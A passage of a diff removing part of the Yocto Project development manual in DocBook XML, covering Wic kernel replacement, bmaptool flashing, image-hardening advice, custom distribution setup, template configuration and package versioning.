-                    image, deletes the existing kernel, and then inserts a
-                    new kernel:
-                    <orderedlist>
-                        <listitem><para>
-                            <emphasis>List the Partitions:</emphasis>
-                            Use the <filename>wic ls</filename> command to list
-                            all the partitions in the Wic image:
-                            <literallayout class='monospaced'>
-     $ wic ls tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic
-     Num     Start        End          Size      Fstype
-      1       1048576     25041919     23993344  fat16
-      2      25165824     72157183     46991360  ext4
-                            </literallayout>
-                            The previous output shows two partitions in the
-                            <filename>core-image-minimal-qemux86.wic</filename>
-                            image.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Examine a Particular Partition:</emphasis>
-                            Use the <filename>wic ls</filename> command again
-                            but in a different form to examine a particular
-                            partition.
-                            <note>
-                                You can get command usage on any Wic command
-                                using the following form:
-                                <literallayout class='monospaced'>
-     $ wic help <replaceable>command</replaceable>
-                                </literallayout>
-                                For example, the following command shows you
-                                the various ways to use the
-                                <filename>wic ls</filename> command:
-                                <literallayout class='monospaced'>
-     $ wic help ls
-                                </literallayout>
-                            </note>
-                            The following command shows what is in Partition
-                            one:
-                            <literallayout class='monospaced'>
-     $ wic ls tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1
-     Volume in drive : is boot
-      Volume Serial Number is E894-1809
-     Directory for ::/
-
-     libcom32 c32    186500 2017-10-09  16:06
-     libutil  c32     24148 2017-10-09  16:06
-     syslinux cfg       220 2017-10-09  16:06
-     vesamenu c32     27104 2017-10-09  16:06
-     vmlinuz        6904608 2017-10-09  16:06
-             5 files           7 142 580 bytes
-                              16 582 656 bytes free
-                            </literallayout>
-                            The previous output shows five files, with the
-                            <filename>vmlinuz</filename> being the kernel.
-                            <note>
-                                If you see the following error, you need to
-                                update or create a
-                                <filename>~/.mtoolsrc</filename> file and
-                                be sure to have the line “mtools_skip_check=1“
-                                in the file.
-                                Then, run the Wic command again:
-                                <literallayout class='monospaced'>
-     ERROR: _exec_cmd: /usr/bin/mdir -i /tmp/wic-parttfokuwra ::/ returned '1' instead of 0
-      output: Total number of sectors (47824) not a multiple of sectors per track (32)!
-      Add mtools_skip_check=1 to your .mtoolsrc file to skip this test
-                                </literallayout>
-                             </note>
-                             </para></listitem>
-                         <listitem><para>
-                             <emphasis>Remove the Old Kernel:</emphasis>
-                             Use the <filename>wic rm</filename> command to
-                             remove the <filename>vmlinuz</filename> file
-                             (kernel):
-                             <literallayout class='monospaced'>
-     $ wic rm tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1/vmlinuz
-                             </literallayout>
-                             </para></listitem>
-                         <listitem><para>
-                             <emphasis>Add In the New Kernel:</emphasis>
-                             Use the <filename>wic cp</filename> command to
-                             add the updated kernel to the Wic image.
-                             Depending on how you built your kernel, it could
-                             be in different places.
-                             If you used <filename>devtool</filename> and
-                             an SDK to build your kernel, it resides in the
-                             <filename>tmp/work</filename> directory of the
-                             extensible SDK.
-                             If you used <filename>make</filename> to build the
-                             kernel, the kernel will be in the
-                             <filename>workspace/sources</filename> area.
-                             </para>
-
-                             <para>The following example assumes
-                             <filename>devtool</filename> was used to build
-                             the kernel:
-                             <literallayout class='monospaced'>
-     cp ~/poky_sdk/tmp/work/qemux86-poky-linux/linux-yocto/4.12.12+git999-r0/linux-yocto-4.12.12+git999/arch/x86/boot/bzImage \
-        ~/poky/build/tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1/vmlinuz
-                             </literallayout>
-                             Once the new kernel is added back into the image,
-                             you can use the <filename>dd</filename>
-                             command or
-                             <link linkend='flashing-images-using-bmaptool'><filename>bmaptool</filename></link>
-                             to flash your wic image onto an SD card
-                             or USB stick and test your target.
-                             <note>
-                                 Using <filename>bmaptool</filename> is
-                                 generally 10 to 20 times faster than using
-                                 <filename>dd</filename>.
-                             </note>
-                             </para></listitem>
-                     </orderedlist>
-                 </para>
-             </section>
-        </section>
-    </section>
-
-    <section id='flashing-images-using-bmaptool'>
-        <title>Flashing Images Using <filename>bmaptool</filename></title>
-
-        <para>
-            A fast and easy way to flash an image to a bootable device
-            is to use Bmaptool, which is integrated into the OpenEmbedded
-            build system.
-            Bmaptool is a generic tool that creates a file's block map (bmap)
-            and then uses that map to copy the file.
-            As compared to traditional tools such as dd or cp, Bmaptool
-            can copy (or flash) large files like raw system image files
-            much faster.
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        If you are using Ubuntu or Debian distributions, you
-                        can install the <filename>bmap-tools</filename> package
-                        using the following command and then use the tool
-                        without specifying <filename>PATH</filename> even from
-                        the root account:
-                        <literallayout class='monospaced'>
-     $ sudo apt-get install bmap-tools
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        If you are unable to install the
-                        <filename>bmap-tools</filename> package, you will
-                        need to build Bmaptool before using it.
-                        Use the following command:
-                        <literallayout class='monospaced'>
-     $ bitbake bmap-tools-native
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            Following, is an example that shows how to flash a Wic image.
-            Realize that while this example uses a Wic image, you can use
-            Bmaptool to flash any type of image.
-            Use these steps to flash an image using Bmaptool:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Update your <filename>local.conf</filename> File:</emphasis>
-                    You need to have the following set in your
-                    <filename>local.conf</filename> file before building
-                    your image:
-                    <literallayout class='monospaced'>
-     IMAGE_FSTYPES += "wic wic.bmap"
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Get Your Image:</emphasis>
-                    Either have your image ready (pre-built with the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>
-                    setting previously mentioned) or take the step to build
-                    the image:
-                    <literallayout class='monospaced'>
-     $ bitbake <replaceable>image</replaceable>
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Flash the Device:</emphasis>
-                    Flash the device with the image by using Bmaptool
-                    depending on your particular setup.
-                    The following commands assume the image resides in the
-                    Build Directory's <filename>deploy/images/</filename>
-                    area:
-                    <itemizedlist>
-                        <listitem><para>
-                            If you have write access to the media, use this
-                            command form:
-                            <literallayout class='monospaced'>
-     $ oe-run-native bmap-tools-native bmaptool copy <replaceable>build-directory</replaceable>/tmp/deploy/images/<replaceable>machine</replaceable>/<replaceable>image</replaceable>.wic /dev/sd<replaceable>X</replaceable>
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            If you do not have write access to the media, set
-                            your permissions first and then use the same
-                            command form:
-                            <literallayout class='monospaced'>
-     $ sudo chmod 666 /dev/sd<replaceable>X</replaceable>
-     $ oe-run-native bmap-tools-native bmaptool copy <replaceable>build-directory</replaceable>/tmp/deploy/images/<replaceable>machine</replaceable>/<replaceable>image</replaceable>.wic /dev/sd<replaceable>X</replaceable>
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-            </orderedlist>
-        </para>
-
-        <para>
-            For help on the <filename>bmaptool</filename> command, use the
-            following command:
-            <literallayout class='monospaced'>
-     $ bmaptool --help
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='making-images-more-secure'>
-        <title>Making Images More Secure</title>
-
-        <para>
-            Security is of increasing concern for embedded devices.
-            Consider the issues and problems discussed in just this
-            sampling of work found across the Internet:
-            <itemizedlist>
-                <listitem><para><emphasis>
-                    "<ulink url='https://www.schneier.com/blog/archives/2014/01/security_risks_9.html'>Security Risks of Embedded Systems</ulink>"</emphasis>
-                    by Bruce Schneier
-                    </para></listitem>
-                <listitem><para><emphasis>
-                    "<ulink url='http://census2012.sourceforge.net/paper.html'>Internet Census 2012</ulink>"</emphasis>
-                    by Carna Botnet</para></listitem>
-                <listitem><para><emphasis>
-                    "<ulink url='http://elinux.org/images/6/6f/Security-issues.pdf'>Security Issues for Embedded Devices</ulink>"</emphasis>
-                    by Jake Edge
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            When securing your image is of concern, there are steps, tools,
-            and variables that you can consider to help you reach the
-            security goals you need for your particular device.
-            Not all situations are identical when it comes to making an
-            image secure.
-            Consequently, this section provides some guidance and suggestions
-            for consideration when you want to make your image more secure.
-            <note>
-                Because the security requirements and risks are
-                different for every type of device, this section cannot
-                provide a complete reference on securing your custom OS.
-                It is strongly recommended that you also consult other sources
-                of information on embedded Linux system hardening and on
-                security.
-            </note>
-        </para>
-
-        <section id='general-considerations'>
-            <title>General Considerations</title>
-
-            <para>
-                General considerations exist that help you create more
-                secure images.
-                You should consider the following suggestions to help
-                make your device more secure:
-                <itemizedlist>
-                    <listitem><para>
-                        Scan additional code you are adding to the system
-                        (e.g. application code) by using static analysis
-                        tools.
-                        Look for buffer overflows and other potential
-                        security problems.
-                    </para></listitem>
-                    <listitem><para>
-                        Pay particular attention to the security for
-                        any web-based administration interface.
-                        </para>
-                        <para>Web interfaces typically need to perform
-                        administrative functions and tend to need to run with
-                        elevated privileges.
-                        Thus, the consequences resulting from the interface's
-                        security becoming compromised can be serious.
-                        Look for common web vulnerabilities such as
-                        cross-site-scripting (XSS), unvalidated inputs,
-                        and so forth.</para>
-                        <para>As with system passwords, the default credentials
-                        for accessing a web-based interface should not be the
-                        same across all devices.
-                        This is particularly true if the interface is enabled
-                        by default as it can be assumed that many end-users
-                        will not change the credentials.
-                    </para></listitem>
-                    <listitem><para>
-                        Ensure you can update the software on the device to
-                        mitigate vulnerabilities discovered in the future.
-                        This consideration especially applies when your
-                        device is network-enabled.
-                    </para></listitem>
-                    <listitem><para>
-                        Ensure you remove or disable debugging functionality
-                        before producing the final image.
-                        For information on how to do this, see the
-                        "<link linkend='considerations-specific-to-the-openembedded-build-system'>Considerations Specific to the OpenEmbedded Build System</link>"
-                        section.
-                        </para></listitem>
-                    <listitem><para>
-                        Ensure you have no network services listening that
-                        are not needed.
-                    </para></listitem>
-                    <listitem><para>
-                        Remove any software from the image that is not needed.
-                    </para></listitem>
-                    <listitem><para>
-                        Enable hardware support for secure boot functionality
-                        when your device supports this functionality.
-                    </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='security-flags'>
-            <title>Security Flags</title>
-
-            <para>
-                The Yocto Project has security flags that you can enable that
-                help make your build output more secure.
-                The security flags are in the
-                <filename>meta/conf/distro/include/security_flags.inc</filename>
-                file in your
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                (e.g. <filename>poky</filename>).
-                <note>
-                    Depending on the recipe, certain security flags are enabled
-                    and disabled by default.
-                </note>
-            </para>
-
-            <para>
-<!--
-                The GCC/LD flags in <filename>security_flags.inc</filename>
-                enable more secure code generation.
-                By including the <filename>security_flags.inc</filename>
-                file, you enable flags to the compiler and linker that cause
-                them to generate more secure code.
-                <note>
-                    The GCC/LD flags are enabled by default in the
-                    <filename>poky-lsb</filename> distribution.
-                </note>
--->
-                Use the following line in your
-                <filename>local.conf</filename> file or in your custom
-                distribution configuration file to enable the security
-                compiler and linker flags for your build:
-                <literallayout class='monospaced'>
-     require conf/distro/include/security_flags.inc
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='considerations-specific-to-the-openembedded-build-system'>
-            <title>Considerations Specific to the OpenEmbedded Build System</title>
-
-            <para>
-                You can take some steps that are specific to the
-                OpenEmbedded build system to make your images more secure:
-                <itemizedlist>
-                    <listitem><para>
-                        Ensure "debug-tweaks" is not one of your selected
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>.
-                        When creating a new project, the default is to provide you
-                        with an initial <filename>local.conf</filename> file that
-                        enables this feature using the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink> variable with the line:
-                <literallayout class='monospaced'>
-     EXTRA_IMAGE_FEATURES = "debug-tweaks"
-                </literallayout>
-                        To disable that feature, simply comment out that line in your
-                        <filename>local.conf</filename> file, or
-                        make sure <filename>IMAGE_FEATURES</filename> does not contain
-                        "debug-tweaks" before producing your final image.
-                        Among other things, leaving this in place sets the
-                        root password as blank, which makes logging in for
-                        debugging or inspection easy during
-                        development but also means anyone can easily log in
-                        during production.
-                        </para></listitem>
-                    <listitem><para>
-                        It is possible to set a root password for the image
-                        and also to set passwords for any extra users you might
-                        add (e.g. administrative or service type users).
-                        When you set up passwords for multiple images or
-                        users, you should not duplicate passwords.
-                        </para>
-                        <para>
-                        To set up passwords, use the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-extrausers'><filename>extrausers</filename></ulink>
-                        class, which is the preferred method.
-                        For an example on how to set up both root and user
-                        passwords, see the
-                        "<ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-extrausers'><filename>extrausers.bbclass</filename></ulink>"
-                        section.
-                        <note>
-                            When adding extra user accounts or setting a
-                            root password, be cautious about setting the
-                            same password on every device.
-                            If you do this, and the password you have set
-                            is exposed, then every device is now potentially
-                            compromised.
-                            If you need this access but want to ensure
-                            security, consider setting a different,
-                            random password for each device.
-                            Typically, you do this as a separate step after
-                            you deploy the image onto the device.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        Consider enabling a Mandatory Access Control (MAC)
-                        framework such as SMACK or SELinux and tuning it
-                        appropriately for your device's usage.
-                        You can find more information in the
-                        <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/meta-selinux/'><filename>meta-selinux</filename></ulink>
-                        layer.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-            </para>
-        </section>
-
-        <section id='tools-for-hardening-your-image'>
-            <title>Tools for Hardening Your Image</title>
-
-            <para>
-                The Yocto Project provides tools for making your image
-                more secure.
-                You can find these tools in the
-                <filename>meta-security</filename> layer of the
-                <ulink url='&YOCTO_GIT_URL;'>Yocto Project Source Repositories</ulink>.
-            </para>
-        </section>
-    </section>
-
-    <section id='creating-your-own-distribution'>
-        <title>Creating Your Own Distribution</title>
-
-        <para>
-            When you build an image using the Yocto Project and
-            do not alter any distribution
-            <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>,
-            you are creating a Poky distribution.
-            If you wish to gain more control over package alternative
-            selections, compile-time options, and other low-level
-            configurations, you can create your own distribution.
-        </para>
-
-        <para>
-            To create your own distribution, the basic steps consist of
-            creating your own distribution layer, creating your own
-            distribution configuration file, and then adding any needed
-            code and Metadata to the layer.
-            The following steps provide some more detail:
-            <itemizedlist>
-                <listitem><para><emphasis>Create a layer for your new distro:</emphasis>
-                    Create your distribution layer so that you can keep your
-                    Metadata and code for the distribution separate.
-                    It is strongly recommended that you create and use your own
-                    layer for configuration and code.
-                    Using your own layer as compared to just placing
-                    configurations in a <filename>local.conf</filename>
-                    configuration file makes it easier to reproduce the same
-                    build configuration when using multiple build machines.
-                    See the
-                    "<link linkend='creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</link>"
-                    section for information on how to quickly set up a layer.
-                    </para></listitem>
-                <listitem><para><emphasis>Create the distribution configuration file:</emphasis>
-                    The distribution configuration file needs to be created in
-                    the <filename>conf/distro</filename> directory of your
-                    layer.
-                    You need to name it using your distribution name
-                    (e.g. <filename>mydistro.conf</filename>).
-                    <note>
-                        The
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
-                        variable in your
-                        <filename>local.conf</filename> file determines the
-                        name of your distribution.
-                    </note></para>
-                    <para>You can split out parts of your configuration file
-                    into include files and then "require" them from within
-                    your distribution configuration file.
-                    Be sure to place the include files in the
-                    <filename>conf/distro/include</filename> directory of
-                    your layer.
-                    A common example usage of include files would be to
-                    separate out the selection of desired version and revisions
-                    for individual recipes.
-</para>
-                    <para>Your configuration file needs to set the following
-                    required variables:
-                    <literallayout class='monospaced'>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_NAME'><filename>DISTRO_NAME</filename></ulink>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_VERSION'><filename>DISTRO_VERSION</filename></ulink>
-                    </literallayout>
-                    These following variables are optional and you typically
-                    set them from the distribution configuration file:
-                    <literallayout class='monospaced'>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_EXTRA_RDEPENDS'><filename>DISTRO_EXTRA_RDEPENDS</filename></ulink>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_EXTRA_RRECOMMENDS'><filename>DISTRO_EXTRA_RRECOMMENDS</filename></ulink>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-TCLIBC'><filename>TCLIBC</filename></ulink>
-                    </literallayout>
-                    <tip>
-                        If you want to base your distribution configuration file
-                        on the very basic configuration from OE-Core, you
-                        can use
-                        <filename>conf/distro/defaultsetup.conf</filename> as
-                        a reference and just include variables that differ
-                        as compared to <filename>defaultsetup.conf</filename>.
-                        Alternatively, you can create a distribution
-                        configuration file from scratch using the
-                        <filename>defaultsetup.conf</filename> file
-                        or configuration files from other distributions
-                        such as Poky or Angstrom as references.
-                    </tip></para></listitem>
-                <listitem><para><emphasis>Provide miscellaneous variables:</emphasis>
-                    Be sure to define any other variables for which you want to
-                    create a default or enforce as part of the distribution
-                    configuration.
-                    You can include nearly any variable from the
-                    <filename>local.conf</filename> file.
-                    The variables you use are not limited to the list in the
-                    previous bulleted item.</para></listitem>
-                <listitem><para><emphasis>Point to Your distribution configuration file:</emphasis>
-                    In your <filename>local.conf</filename> file in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-                    set your
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
-                    variable to point to your distribution's configuration file.
-                    For example, if your distribution's configuration file is
-                    named <filename>mydistro.conf</filename>, then you point
-                    to it as follows:
-                    <literallayout class='monospaced'>
-     DISTRO = "mydistro"
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Add more to the layer if necessary:</emphasis>
-                    Use your layer to hold other information needed for the
-                    distribution:
-                    <itemizedlist>
-                        <listitem><para>Add recipes for installing
-                            distro-specific configuration files that are not
-                            already installed by another recipe.
-                            If you have distro-specific configuration files
-                            that are included by an existing recipe, you should
-                            add an append file (<filename>.bbappend</filename>)
-                            for those.
-                            For general information and recommendations
-                            on how to add recipes to your layer, see the
-                            "<link linkend='creating-your-own-layer'>Creating Your Own Layer</link>"
-                            and
-                            "<link linkend='best-practices-to-follow-when-creating-layers'>Following Best Practices When Creating Layers</link>"
-                            sections.</para></listitem>
-                        <listitem><para>Add any image recipes that are specific
-                            to your distribution.</para></listitem>
-                        <listitem><para>Add a <filename>psplash</filename>
-                            append file for a branded splash screen.
-                            For information on append files, see the
-                            "<link linkend='using-bbappend-files'>Using .bbappend Files in Your Layer</link>"
-                            section.</para></listitem>
-                        <listitem><para>Add any other append files to make
-                            custom changes that are specific to individual
-                            recipes.</para></listitem>
-                    </itemizedlist></para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='creating-a-custom-template-configuration-directory'>
-        <title>Creating a Custom Template Configuration Directory</title>
-
-        <para>
-            If you are producing your own customized version
-            of the build system for use by other users, you might
-            want to customize the message shown by the setup script or
-            you might want to change the template configuration files (i.e.
-            <filename>local.conf</filename> and
-            <filename>bblayers.conf</filename>) that are created in
-            a new build directory.
-        </para>
-
-        <para>
-            The OpenEmbedded build system uses the environment variable
-            <filename>TEMPLATECONF</filename> to locate the directory
-            from which it gathers configuration information that ultimately
-            ends up in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-            <filename>conf</filename> directory.
-            By default, <filename>TEMPLATECONF</filename> is set as
-            follows in the <filename>poky</filename> repository:
-            <literallayout class='monospaced'>
-     TEMPLATECONF=${TEMPLATECONF:-meta-poky/conf}
-            </literallayout>
-            This is the directory used by the build system to find templates
-            from which to build some key configuration files.
-            If you look at this directory, you will see the
-            <filename>bblayers.conf.sample</filename>,
-            <filename>local.conf.sample</filename>, and
-            <filename>conf-notes.txt</filename> files.
-            The build system uses these files to form the respective
-            <filename>bblayers.conf</filename> file,
-            <filename>local.conf</filename> file, and display the list of
-            BitBake targets when running the setup script.
-        </para>
-
-        <para>
-            To override these default configuration files with
-            configurations you want used within every new
-            Build Directory, simply set the
-            <filename>TEMPLATECONF</filename> variable to your directory.
-            The <filename>TEMPLATECONF</filename> variable is set in the
-            <filename>.templateconf</filename> file, which is in the
-            top-level
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            folder (e.g. <filename>poky</filename>).
-            Edit the <filename>.templateconf</filename> so that it can locate
-            your directory.
-        </para>
-
-        <para>
-            Best practices dictate that you should keep your
-            template configuration directory in your custom distribution layer.
-            For example, suppose you have a layer named
-            <filename>meta-mylayer</filename> located in your home directory
-            and you want your template configuration directory named
-            <filename>myconf</filename>.
-            Changing the <filename>.templateconf</filename> as follows
-            causes the OpenEmbedded build system to look in your directory
-            and base its configuration files on the
-            <filename>*.sample</filename> configuration files it finds.
-            The final configuration files (i.e.
-            <filename>local.conf</filename> and
-            <filename>bblayers.conf</filename> ultimately still end up in
-            your Build Directory, but they are based on your
-            <filename>*.sample</filename> files.
-            <literallayout class='monospaced'>
-     TEMPLATECONF=${TEMPLATECONF:-meta-mylayer/myconf}
-            </literallayout>
-        </para>
-
-        <para>
-            Aside from the <filename>*.sample</filename> configuration files,
-            the <filename>conf-notes.txt</filename> also resides in the
-            default <filename>meta-poky/conf</filename> directory.
-            The script that sets up the build environment
-            (i.e.
-            <ulink url="&YOCTO_DOCS_REF_URL;#structure-core-script"><filename>&OE_INIT_FILE;</filename></ulink>)
-            uses this file to display BitBake targets as part of the script
-            output.
-            Customizing this <filename>conf-notes.txt</filename> file is a
-            good way to make sure your list of custom targets appears
-            as part of the script's output.
-        </para>
-
-        <para>
-            Here is the default list of targets displayed as a result of
-            running either of the setup scripts:
-            <literallayout class='monospaced'>
-     You can now run 'bitbake &lt;target&gt;'
-
-     Common targets are:
-         core-image-minimal
-         core-image-sato
-         meta-toolchain
-         meta-ide-support
-            </literallayout>
-        </para>
-
-        <para>
-            Changing the listed common targets is as easy as editing your
-            version of <filename>conf-notes.txt</filename> in your
-            custom template configuration directory and making sure you
-            have <filename>TEMPLATECONF</filename> set to your directory.
-        </para>
-    </section>
-
-    <section id='dev-saving-memory-during-a-build'>
-        <title>Conserving Disk Space During Builds</title>
-
-        <para>
-            To help conserve disk space during builds, you can add the
-            following statement to your project's
-            <filename>local.conf</filename> configuration file found in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
-            <literallayout class='monospaced'>
-     INHERIT += "rm_work"
-            </literallayout>
-            Adding this statement deletes the work directory used for building
-            a recipe once the recipe is built.
-            For more information on "rm_work", see the
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-rm-work'><filename>rm_work</filename></ulink>
-            class in the Yocto Project Reference Manual.
-        </para>
-    </section>
-
-    <section id='working-with-packages'>
-        <title>Working with Packages</title>
-
-        <para>
-            This section describes a few tasks that involve packages:
-            <itemizedlist>
-                <listitem><para>
-                    <link linkend='excluding-packages-from-an-image'>Excluding packages from an image</link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='incrementing-a-binary-package-version'>Incrementing a binary package version</link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='handling-optional-module-packaging'>Handling optional module packaging</link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='using-runtime-package-management'>Using runtime package management</link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='generating-and-using-signed-packages'>Generating and using signed packages</link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='testing-packages-with-ptest'>Setting up and running package test (ptest)</link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='creating-node-package-manager-npm-packages'>Creating node package manager (NPM) packages</link>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <section id='excluding-packages-from-an-image'>
-            <title>Excluding Packages from an Image</title>
-
-            <para>
-                You might find it necessary to prevent specific packages
-                from being installed into an image.
-                If so, you can use several variables to direct the build
-                system to essentially ignore installing recommended packages
-                or to not install a package at all.
-            </para>
-
-            <para>
-                The following list introduces variables you can use to
-                prevent packages from being installed into your image.
-                Each of these variables only works with IPK and RPM
-                package types.
-                Support for Debian packages does not exist.
-                Also, you can use these variables from your
-                <filename>local.conf</filename> file or attach them to a
-                specific image recipe by using a recipe name override.
-                For more detail on the variables, see the descriptions in the
-                Yocto Project Reference Manual's glossary chapter.
-                <itemizedlist>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></ulink>:
-                        Use this variable to specify "recommended-only"
-                        packages that you do not want installed.
-                        </para></listitem>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></ulink>:
-                        Use this variable to prevent all "recommended-only"
-                        packages from being installed.
-                        </para></listitem>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></ulink>:
-                        Use this variable to prevent specific packages from
-                        being installed regardless of whether they are
-                        "recommended-only" or not.
-                        You need to realize that the build process could
-                        fail with an error when you
-                        prevent the installation of a package whose presence
-                        is required by an installed package.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='incrementing-a-binary-package-version'>
-            <title>Incrementing a Package Version</title>
-
-            <para>
-                This section provides some background on how binary package
-                versioning is accomplished and presents some of the services,
-                variables, and terminology involved.
-            </para>
-
-            <para>
-                In order to understand binary package versioning, you need
-                to consider the following:
-                <itemizedlist>
-                    <listitem><para>
-                        Binary Package:  The binary package that is eventually
-                        built and installed into an image.
-                        </para></listitem>
-                    <listitem><para>
-                        Binary Package Version:  The binary package version
-                        is composed of two components - a version and a
-                        revision.
-                        <note>
-                            Technically, a third component, the "epoch" (i.e.
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PE'><filename>PE</filename></ulink>)
-                            is involved but this discussion for the most part
-                            ignores <filename>PE</filename>.
-                        </note>
-                        The version and revision are taken from the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
-                        and
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
-                        variables, respectively.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>PV</filename>:  The recipe version.
-                        <filename>PV</filename> represents the version of the
-                        software being packaged.
-                        Do not confuse <filename>PV</filename> with the
-                        binary package version.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>PR</filename>:  The recipe revision.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCPV'><filename>SRCPV</filename></ulink>:
-                        The OpenEmbedded build system uses this string
-                        to help define the value of <filename>PV</filename>
-                        when the source code revision needs to be included
-                        in it.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='https://wiki.yoctoproject.org/wiki/PR_Service'>PR Service</ulink>:
-                        A network-based service that helps automate keeping
-                        package feeds compatible with existing package
-                        manager applications such as RPM, APT, and OPKG.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Whenever the binary package content changes, the binary package
-                version must change.
-                Changing the binary package version is accomplished by changing
-                or "bumping" the <filename>PR</filename> and/or
-                <filename>PV</filename> values.
-                Increasing these values occurs one of two ways:
-                <itemizedlist>
-                    <listitem><para>Automatically using a Package Revision
-                        Service (PR Service).
-                        </para></listitem>
-                    <listitem><para>Manually incrementing the
-                        <filename>PR</filename> and/or
-                        <filename>PV</filename> variables.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Given a primary challenge of any build system and its users
-                is how to maintain a package feed that is compatible with
-                existing package manager applications such as RPM, APT, and
-                OPKG, using an automated system is much preferred over a
-                manual system.
-                In either system, the main requirement is that binary package
-                version numbering increases in a linear fashion and that a
-                number of version components exist that support that linear
-                progression.
-                For information on how to ensure package revisioning remains
-                linear, see the
-                "<link linkend='automatically-incrementing-a-binary-package-revision-number'>Automatically Incrementing a Binary Package Revision Number</link>"
-                section.
-            </para>
-
-            <para>
-                The following three sections provide related information on the
-                PR Service, the manual method for "bumping"
-                <filename>PR</filename> and/or <filename>PV</filename>, and
-                on how to ensure binary package revisioning remains linear.
-            </para>
-
-            <section id='working-with-a-pr-service'>
-                <title>Working With a PR Service</title>
-
-                <para>
-                    As mentioned, attempting to maintain revision numbers in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
-                    is error prone, inaccurate, and causes problems for people
-                    submitting recipes.
-                    Conversely, the PR Service automatically generates
-                    increasing numbers, particularly the revision field,
-                    which removes the human element.
-                    <note>
-                        For additional information on using a PR Service, you
-                        can see the
-                        <ulink url='&YOCTO_WIKI_URL;/wiki/PR_Service'>PR Service</ulink>
-                        wiki page.
-                    </note>
-                </para>
-
-                <para>
-                    The Yocto Project uses variables in order of
-                    decreasing priority to facilitate revision numbering (i.e.
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PE'><filename>PE</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>, and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
